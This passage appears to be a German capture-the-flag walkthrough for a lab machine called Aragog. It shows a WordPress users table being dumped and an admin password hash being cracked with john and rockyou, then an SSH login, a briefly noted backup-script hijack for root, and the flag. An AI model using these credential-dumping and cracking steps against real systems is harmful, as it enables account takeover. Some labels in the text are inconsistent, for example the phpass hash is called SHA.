# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
# --
HASH: *EB39FD0B3D9B22D2B74F6D4BED097A6682A53154

Possible Hashs:
[+] MySQL 160bit - SHA-1(SHA-1($pass))

Wir Identifizieren den Hash.

MariaDB [mysql]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [wordpress]> show tables;
+---------------------------+
| Tables_in_wordpress |
+---------------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
| wp_wpfm_backup |
+---------------------------+
select * from wp_users;
+--+----------------+-------------------------------------------+---------------+--------------------------+----------+-----------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+--+----------------+-------------------------------------------+---------------+--------------------------+----------+-----------------------+---------------------+-------------+--------------+
| 1 | hagrid98 | $P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc. | wp-admin | hagrid98@localhost.local | | 2021-03-31 14:21:02 | | 0 | WP-Admin |
+--+----------------+-------------------------------------------+---------------+--------------------------+----------+-----------------------+---------------------+-------------+--------------+
1 row in set (0.000 sec)

MySQL Hash auslesen

┌──(pwn)─(root㉿CCat)-[~]
└─# echo '$P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc.' > hash
┌──(pwn)─(root㉿CCat)-[~]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 16 openMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password123 (?)
1g 0:00:00:00 DONE (2024-10-04 00:48) 33.33g/s 51200p/s 51200c/s 51200C/s R3v_m4lwh3r3_k1nG!!..landon
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed

wir crackten den SHA Key

┌──(pwn)─(root㉿CCat)-[~]
└─# ssh hagrid98@192.168.2.127
The authenticity of host '192.168.2.127 (192.168.2.127)' can't be established.
ED25519 key fingerprint is SHA256:oAgAxZkRbtwe40/oXGuZbaPjiDWzluKXPpTv2r6TrAs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.127' (ED25519) to the list of known hosts.
hagrid98@192.168.2.127's password:
Linux Aragog 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/

Debian GNU/Linux comes with ABSOLUTELY N WARRANTY, to the extent
permitted by applicable law.

Wir loggen uns über SSH ein.

Privilege Escalation
Privilege Escalation per file Hijacking
hagrid98@Aragog:/opt$ nano .backup.sh

Flags

cat root.txt
ANDROID{u_GOT_root_buddy}

Hier ist der Flag.